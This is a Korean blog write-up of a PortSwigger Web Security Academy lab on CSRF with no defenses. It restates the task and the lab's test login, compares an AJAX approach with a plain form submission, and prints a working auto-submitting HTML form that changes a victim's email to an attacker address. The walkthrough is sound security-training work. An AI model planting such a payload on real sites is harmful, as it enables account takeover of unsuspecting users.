2026. 4. 20. 20:59ㆍ보안/Web security Academy
Lab: CSRF vulnerability with no defenses
This lab's email change functionality is vulnerable to CSRF.
To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.
You can log in to your own account using the following credentials: wiener:peter
( 이 연구소의 이메일 변경 기능은 CSRF에 취약합니다.
실험실을 해결하려면 CSRF 공격을 사용하여 시청자의 이메일 주소를 변경하고 익스플로잇 서버에 업로드하는 HTML을 작성하세요.
다음 자격 증명을 사용하여 자신의 계정에 로그인할 수 있습니다: wiener:peter )
1. 웹 페이지 서버에 html 코드를 작성하여 CSRF 취약점으로 이메일을 변경하는 작업입니다
이전에 했던 코드를 그대로 사용하니 되지가 않았습니다(뭐 그렇겠죠..
| 방식 | AJAX + 토큰 추출 | 단순 form 제출 |
| SOP 영향 | ❌ 막힘 | ✅ 영향 없음 |
| 토큰 필요 | 필요함 (시도함) | 필요 없음 |
| 결과 | 실패 | 성공 |
이런 차이가 있다고 합니다..
그러면 다른 방식으로 문제를 풀어야하는데 일단 html코드를 사용하여 my-account를 사용을 해야할것같습니다 wiener에 접속하여 이메일 변경을 하니

post 방식으로 my-account/change-email까지 들어간것을 확인했습니다 그러면 이러한 방식으로 공격할 웹 사이트를 지정할 수 있을것같습니다
그러면 지정한 웹 사이트에 들어갈 데이터를 넣어주고 이를 보내면 될것같습니다
<html>
<body>
<form action="https://[YOUR-LAB-ID].web-security-academy.net/my-account/change-email" method="POST" id="csrf-form">
<input type="hidden" name="email" value="hacker@attacker.com" />
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
이상입니다
감사합니다
'보안 > Web security Academy' 카테고리의 다른 글
| web security academy 38 (0) | 2026.04.23 |
|---|---|
| web security academy 36 (0) | 2026.04.13 |
| web security academy 35 (0) | 2026.04.12 |
| web security academy 34 (1) | 2026.04.07 |
| web security academy 33 (0) | 2026.04.02 |